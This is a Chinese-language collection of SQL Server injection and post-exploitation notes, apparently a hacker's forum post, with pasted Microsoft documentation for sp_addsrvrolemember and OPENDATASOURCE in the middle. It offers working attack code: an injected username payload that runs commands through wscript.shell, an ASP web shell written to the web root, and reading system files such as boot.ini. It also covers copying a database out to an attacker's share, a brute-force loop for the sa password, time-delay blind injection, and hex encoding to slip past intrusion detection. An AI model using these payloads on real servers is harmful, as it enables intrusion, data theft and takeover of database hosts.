一些sql擴展
xp_regaddmultistring
xp_regdeletekey 刪除鍵名
xp_regdeletevalue 刪除鍵值
xp_regenumkeys 枚舉
xp_regenumvalues
xp_regread 對於
xp_regremovemultistring
xp_regwrite 寫
xp_availablemedia 查看驅動器
xp_dirtree 看目錄
xp_enumdsn ODBC數據源
xp_loginconfig 一些服務器安全配置的信息
xp_makecab 打包,某些dbo權限先可做大用
xp_ntsec_enumdomains 枚舉域名相關信息
xp_terminate_process 終端進程和ip啦
xp_logininfo 當前登錄帳號
sp_configure 檢索數據庫中的內容(我覺得這個挺有用的)
sp_helpextendedproc 得到所有的存儲擴展
sp_who2 查詢用戶,他們登錄的主機,他們在數據庫中執行的操作等等
一些網絡信息
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters',
'nullsessionshares'
SNMP輔助網絡踩點
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcomm
unities'
開始一些系統服務,比如telnet,前提希望可以跑來admin或者一些系統密碼
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
Sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll' 此擴展可以運行程序
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。簡單地創建這個表:
create table foo( line varchar(8000) )
然後執行bulk insert操作把文件中的數據插入到表中,如:
bulk insert foo from 'c:\inetpub\wwwroot\admin\inc.asp'
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar
'S'參數為執行查詢的服務器,'U'參數為用戶名,'P'參數為密碼,這裡為'foobar'
SQL SERVER中提供了幾個內置的允許創建ActiveX自動執行腳本的存儲過程。這些腳本和運行在windows腳本解釋器下的腳本,或者ASP腳本程序一樣——他們使用VBScript或JavaScript書寫,他們創建自動執行對象並和它們交互。一個自動執行腳本使用這種方法書寫可以在Transact-SQL中做任何在ASP腳本中,或者WSH腳本中可以做的任何事情
使用'wscript.shell'對象建立了一個記事本的實例:
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'notepad.exe'
指定在用戶名後面來執行它:
Username:'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'—
使用FSO讀一個已知的文本文件:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
創建了一個能執行通過提交的命令,默認是asp那組權限的用戶下運行,前提是sp_oacreate擴展存在
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'
sp_who '1' select * from sysobjects
針對局域網滲透,備份拖庫或者非sa用戶
declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat ,name=test;--
當前數據庫就備份到你的硬盤上了
select * from openrowset(sqloledb,myserver;sa;,select * from table) 回連,默認需要支持多語句查詢
添加登錄,使其成為固定服務器角色的成員。
語法
sp_addsrvrolemember [ @loginame = ] 'login'
[@rolename =] 'role'
參數
[@loginame =] 'login'
是添加到固定服務器角色的登錄名稱。login 的數據類型為 sysname,沒有默認值。login 可以是 Microsoft? SQL Server? 登錄或 Microsoft Windows NT? 用戶帳戶。如果還沒有對該 Windows NT 登錄授予 SQL Server 訪問權限,那麼將自動對其授予訪問權限。
[@rolename =] 'role'
要將登錄添加到的固定服務器角色的名稱。role 的數據類型為 sysname,默認值為 NULL,它必須是下列值之一:
sysadmin
securityadmin
serveradmin
setupadmin
processadmin
diskadmin
dbcreator
bulkadmin
返回代碼值
0(成功)或 1(失敗)
注釋
在將登錄添加到固定服務器角色時,該登錄就會得到與此固定服務器角色相關的權限。
不能更改 sa 登錄的角色成員資格。
請使用 sp_addrolemember 將成員添加到固定數據庫角色或用戶定義的角色。
不能在用戶定義的事務內執行 sp_addsrvrolemember 存儲過程。
權限
sysadmin 固定服務器的成員可以將成員添加到任何固定服務器角色。固定服務器角色的成員可以執行 sp_addsrvrolemember 將成員只添加到同一個固定服務器角色。
示例
下面的示例將 Windows NT 用戶 Corporate\HelenS 添加到 sysadmin 固定服務器角色中。
EXEC sp_addsrvrolemember 'Corporate\HelenS', 'sysadmin'
OPENDATASOURCE
不使用鏈接的服務器名,而提供特殊的連接信息,並將其作為四部分對象名的一部分。
語法
OPENDATASOURCE ( provider_name, init_string )
參數
provider_name
注冊為用於訪問數據源的 OLE DB 提供程序的 PROGID 的名稱。provider_name 的數據類型為 char,沒有默認值。
init_string
連接字符串,這些字符串將要傳遞給目標提供程序的 IDataInitialize 接口。提供程序字符串語法是以關鍵字值對為基礎的,這些關鍵字值對由分號隔開,例如:"keyword1=value; keyword2=value."
在 Microsoft? Data Access SDK 中定義了基本語法。有關所支持的特定關鍵字值對的信息,請參見提供程序中的文檔。下表列出 init_string 參數中最常用的關鍵字。
關鍵字 OLE DB 屬性 有效值和描述
數據源 DBPROP_INIT_DATASOURCE 要連接的數據源的名稱。不同的提供程序用不同的方法對此進行解釋。對於 SQL Server OLE DB 提供程序來說,這會指明服務器的名稱。對於 Jet OLE DB 提供程序來說,這會指明 .mdb 文件或 .xls 文件的完整路徑。
位置 DBPROP_INIT_LOCATION 要連接的數據庫的位置。
擴展屬性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的連接字符串。
連接超時 DBPROP_INIT_TIMEOUT 超時值,在該超時值後,連接嘗試將失敗。
用戶 ID DBPROP_AUTH_USERID 用於該連接的用戶 ID。
密碼 DBPROP_AUTH_PASSWORD 用於該連接的密碼。
目錄 DBPROP_INIT_CATALOG 連接到數據源時的初始或默認的目錄名稱。
OPENDATASOURCE 函數可以在能夠使用鏈接服務器名的相同 Transact-SQL 語法位置中使用。因此,就可以將 OPENDATASOURCE 用作四部分名稱的第一部分,該名稱指的是 SELECT、INSERT、UPDATE 或 DELETE 語句中的表或視圖的名稱;或者指的是 EXECUTE 語句中的遠程存儲過程。當執行遠程存儲過程時,OPENDATASOURCE 應該指的是另一個 SQL Server。OPENDATASOURCE 不接受參數變量。
與 OPENROWSET 函數類似,OPENDATASOURCE 應該只引用那些不經常訪問的 OLE DB 數據源。對於訪問次數稍多的任何數據源,請為它們定義鏈接的服務器。無論 OPENDATASOURCE 還是 OPENROWSET 都不能提供鏈接的服務器定義的全部功能,例如,安全管理以及查詢目錄信息的能力。每次調用 OPENDATASOURCE 時,都必須提供所有的連接信息(包括密碼)。
示例
下面的示例訪問來自某個表的數據,該表在 SQL Server 的另一個實例中。
SELECT *
FROM OPENDATASOURCE(
'SQLOLEDB',
'Data Source=ServerName;User ID=MyUID;Password=MyPass'
).Northwind.dbo.Categories
下面是個查詢的示例,它通過用於 Jet 的 OLE DB 提供程序查詢 Excel 電子表格。
SELECT *
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\Finance\account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions
針對MSDASQL 用存儲過程建立的sql連接,在blackbox測試中,好象沒什麼注入區別
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'
select @pwd_len = 8
select @username = 'sa'
while @i < @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N'select * from
OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username +
N';pwd=' + @pwd + N''',''select @@version'')'
exec xp_execresultset @query, N'master'
--check for success
(code deleted)
-- increment the password
(code deleted)
end
盲注技巧之一,時間延緩(可以加一個循環函數,運行查詢時間越久說說明當前字段正確)
if (select user) = 'sa' waitfor delay '0:0:5'
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'
create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
insert into pubs..tmp_file exec master..xp_fileexist 'c:\boot.ini'
if exists (select * from pubs..tmp_file) waitfor delay '0:0:5'
if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'
字符對比
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor
delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 1))) > 0 waitfor delay '0:0:5'
編碼的秘密,饒過IDS
declare @q varchar(8000)
select @q = 0x73656c65637420404076657273696f6e
exec(@q)
This runs 'select @@version', as does:
declare @q nvarchar(4000)
select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00
exec(@q)
In the stored procedure example above we saw how a 'sysname' parameter can contain
multiple SQL statements without the use of single quotes or semicolons:
sp_msdropretry [foo drop table logs select * from sysobjects], [bar]
嘻嘻,不知道這次被轉走以後會不會看到偶的名字呢?~要有的話,就把高級注入筆記I也發出來
